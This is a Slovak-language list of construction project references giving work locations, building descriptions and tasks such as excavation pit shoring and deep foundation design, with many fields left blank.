Miesto práce:  PERNECKÁ ULICA, BRATISLAVA, parc. č. 257/1
Popis stavby:
Popis práce: PAŽENIE STAVEBNEJ JAMY
Miesto práce:  NOVOSVETSKÁ 43/A, BRATISLAVA
Popis stavby: SUPERMARKET TESCOM FILAKOVO 2K
Popis práce: PAŽENIE STAVEBNEJ JAMY
Miesto práce:  PAJŠTÚNSKA UL. BRATISLAVA
Popis stavby: CESTNÝ MOST KOŠECA NAD ŽELEZNIČNOU TRAŤOU V NŽKM 144,572 (SŽKM 1456,220)
Popis práce:
Miesto práce:  ILAVA-LADCE
Popis stavby: SO-02 BYTOVÝ DOM
Popis práce:
Miesto práce:  MALACKY
Popis stavby:
Popis práce:
Miesto práce:  MESTO NAD VÁHOM – PÚCHOV
Popis stavby:
Popis práce:
Miesto práce:  RIMAVSKÁ SOBOTA
Popis stavby:
Popis práce:
Miesto práce: 
Popis stavby:
Popis práce:
Miesto práce: Sadová ul., Senica
Popis stavby:
Popis práce:
Miesto práce: KARPATSKÁ ULICA, Č.P. 7845/4
Popis stavby:
NÁJOMNÝ BYTOVÝ DOM SO-01 NÁJOMNÝ BYTOVÝ DOM KOSTOL
REFORMOVANEJ CIRKVI NA SLOVENSKU VELKÉ LUDINCE č.212
Popis práce:
Miesto práce: Zvolen
Popis stavby:
Popis práce:
Miesto práce: Senec
Popis stavby:
Popis práce:
Miesto práce: Krásna 1211/195, 92401 Galanta
Popis stavby:REKONŠTRUKCIA HRADNÉHO PALÁCA A OBJEKTOV V AREÁLI BRATISLAVSKÉHO HRADU
Popis práce:
Miesto práce: Bratislava
Popis stavby:
Popis práce:
Miesto práce: DUNAJSKÁ ULICA ,Bratislava, parcela č.8870/3/4/5
Popis stavby: SO 201 – MONTÁŽNA HALA
Popis práce:
Miesto práce: BOJNÍCKA ul., ŽABÍ MAJER, BRATISLAVA
Popis stavby: LOGISTICKO SKLADOVACÍ OBJEKT SO – 100
Popis práce:
projekt hĺbkového založenia
Úprava podložia
Miesto práce: Lužianky